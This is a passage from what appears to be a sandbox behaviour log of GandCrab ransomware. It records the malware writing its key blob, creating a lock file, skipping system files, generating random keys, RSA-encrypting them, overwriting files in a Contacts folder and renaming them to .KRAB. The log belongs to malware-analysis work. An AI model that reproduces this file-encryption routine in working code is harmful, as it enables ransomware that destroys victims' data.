KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0085.805] WriteFile (in: hFile=0x320, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f220, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f220*=0x1f6e, lpOverlapped=0x0) returned 1 [0085.806] CloseHandle (hObject=0x320) returned 1 [0085.806] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.806] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.807] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x21, wMilliseconds=0x3)) [0085.807] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.807] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0085.807] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0085.808] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\d2ca4a08d2ca4dee3d.lock") returned 54 [0085.808] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\contacts\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0085.808] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.808] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.809] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\") returned 31 [0085.809] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\*" [0085.809] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0x1023cb8 [0085.809] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.809] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0085.809] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.809] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.809] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0085.809] lstrcmpW (lpString1="Aclviho ASldjfl.contact", lpString2=".") returned 1 [0085.809] lstrcmpW (lpString1="Aclviho ASldjfl.contact", lpString2="..") returned 1 [0085.809] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\", lpString2="Aclviho ASldjfl.contact" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\Aclviho ASldjfl.contact") returned="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\Aclviho ASldjfl.contact" [0085.809] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.810] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\Aclviho ASldjfl.contact.KRAB") returned 59 [0085.810] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\Aclviho ASldjfl.contact") returned 54 [0085.810] lstrlenW (lpString=".contact") returned 8 [0085.810] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.810] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".contact ") returned 9 [0085.810] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.811] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\Aclviho ASldjfl.contact") returned 54 [0085.811] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\Aclviho ASldjfl.contact") returned 54 [0085.811] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="desktop.ini") returned -1 [0085.811] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="autorun.inf") returned -1 [0085.811] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="ntuser.dat") returned -1 [0085.811] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="iconcache.db") returned -1 [0085.811] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="bootsect.bak") returned -1 [0085.811] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="boot.ini") returned -1 [0085.811] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="ntuser.dat.log") returned -1 [0085.811] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="thumbs.db") returned -1 [0085.811] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="KRAB-DECRYPT.html") returned -1 [0085.811] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="KRAB-DECRYPT.txt") returned -1 [0085.811] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="CRAB-DECRYPT.txt") returned -1 [0085.811] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="ntldr") returned -1 [0085.811] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="NTDETECT.COM") returned -1 [0085.811] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="Bootfont.bin") returned -1 [0085.811] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.813] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011458) returned 1 [0085.814] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0085.815] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0085.815] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0085.815] CryptGenRandom (in: hProv=0x1011458, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0085.815] CryptReleaseContext (hProv=0x1011458, dwFlags=0x0) returned 1 [0085.815] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.815] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011018) returned 1 [0085.817] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0085.817] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0085.818] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0085.818] CryptGenRandom (in: hProv=0x1011018, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0085.818] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0085.818] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.818] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010f08) returned 1 [0085.820] CryptImportKey (in: hProv=0x1010f08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x1023278) returned 1 [0085.820] CryptGetKeyParam (in: hKey=0x1023278, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0085.820] CryptEncrypt (in: hKey=0x1023278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0085.820] GetLastError () returned 0x0 [0085.820] CryptDestroyKey (hKey=0x1023278) returned 1 [0085.820] CryptReleaseContext (hProv=0x1010f08, dwFlags=0x0) returned 1 [0085.820] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010df8) returned 1 [0085.822] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x10231f8) returned 1 [0085.822] CryptGetKeyParam (in: hKey=0x10231f8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0085.822] CryptEncrypt (in: hKey=0x10231f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0085.822] GetLastError () returned 0x0 [0085.822] CryptDestroyKey (hKey=0x10231f8) returned 1 [0085.822] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0085.822] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\ciihmnxmn6ps\\contacts\\aclviho asldjfl.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0085.823] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0085.823] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0085.824] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x49a, lpOverlapped=0x0) returned 1 [0085.837] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffffb66, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.837] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x49a, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x49a, lpOverlapped=0x0) returned 1 [0085.837] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0085.837] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.841] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.842] CloseHandle (hObject=0x434) returned 1 [0085.842] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.842] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\ciihmnxmn6ps\\contacts\\aclviho asldjfl.contact"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\Aclviho ASldjfl.contact.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\contacts\\aclviho asldjfl.contact.krab")) returned 1 [0085.843] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.843] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0085.843] lstrcmpW (lpString1="asdlfk poopvy.contact", lpString2=".") returned 1 [0085.843] lstrcmpW (lpString1="asdlfk poopvy.contact", lpString2="..") returned 1 [0085.843] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\", lpString2="asdlfk poopvy.contact" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\asdlfk poopvy.contact") returned="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\asdlfk poopvy.contact" [0085.843] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.844] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\asdlfk poopvy.contact.KRAB") returned 57 [0085.844] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\asdlfk poopvy.contact") returned 52 [0085.844] lstrlenW (lpString=".contact") returned 8 [0085.844] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.844] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".contact ") returned 9 [0085.844] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.845] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\asdlfk poopvy.contact") returned 52 [0085.845] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\asdlfk poopvy.contact") returned 52 [0085.845] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="desktop.ini") returned -1 [0085.845] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="autorun.inf") returned -1 [0085.845] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="ntuser.dat") returned -1 [0085.845] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="iconcache.db") returned -1 [0085.845] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="bootsect.bak") returned -1 [0085.845] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="boot.ini") returned -1 [0085.845] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="ntuser.dat.log") returned -1 [0085.845] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="thumbs.db") returned -1 [0085.845] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="KRAB-DECRYPT.html") returned -1 [0085.845] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="KRAB-DECRYPT.txt") returned -1 [0085.845] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="CRAB-DECRYPT.txt") returned -1 [0085.845] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="ntldr") returned -1 [0085.845] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="NTDETECT.COM") returned -1 [0085.845] lstrcmpiW (lpString1="asdlfk poopvy.contact", lpString2="Bootfont.bin") returned -1 [0085.845] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.846] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011238) returned 1 [0085.847] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0085.848] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0085.848] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0085.848] CryptGenRandom (in: hProv=0x1011238, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0085.848] CryptReleaseContext (hProv=0x1011238, dwFlags=0x0) returned 1 [0085.848] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.848] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011898) returned 1 [0085.850] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0085.850] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0085.851] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0085.851] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0085.851] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0085.851] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.851] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010bd8) returned 1 [0085.853] CryptImportKey (in: hProv=0x1010bd8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x1022ff8) returned 1 [0085.853] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0085.853] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0085.854] GetLastError () returned 0x0 [0085.854] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0085.854] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0085.854] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011898) returned 1 [0085.855] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x1023278) returned 1 [0085.855] CryptGetKeyParam (in: hKey=0x1023278, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0085.855] CryptEncrypt (in: hKey=0x1023278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0085.856] GetLastError () returned 0x0 [0085.856] CryptDestroyKey (hKey=0x1023278) returned 1 [0085.856] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0085.856] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\ciihmnxmn6ps\\contacts\\asdlfk poopvy.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0085.858] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0085.859] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0085.859] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x493, lpOverlapped=0x0) returned 1 [0085.873] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffffb6d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.873] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x493, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x493, lpOverlapped=0x0) returned 1 [0085.873] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0085.873] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.877] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.878] CloseHandle (hObject=0x434) returned 1 [0085.878] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.878] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\ciihmnxmn6ps\\contacts\\asdlfk poopvy.contact"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\asdlfk poopvy.contact.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\contacts\\asdlfk poopvy.contact.krab")) returned 1 [0085.879] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.879] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0085.879] lstrcmpW (lpString1="chucu jadnvk.contact", lpString2=".") returned 1 [0085.879] lstrcmpW (lpString1="chucu jadnvk.contact", lpString2="..") returned 1 [0085.879] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\", lpString2="chucu jadnvk.contact" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\chucu jadnvk.contact") returned="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\chucu jadnvk.contact" [0085.879] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.880] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\chucu jadnvk.contact.KRAB") returned 56 [0085.880] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\chucu jadnvk.contact") returned 51 [0085.880] lstrlenW (lpString=".contact") returned 8 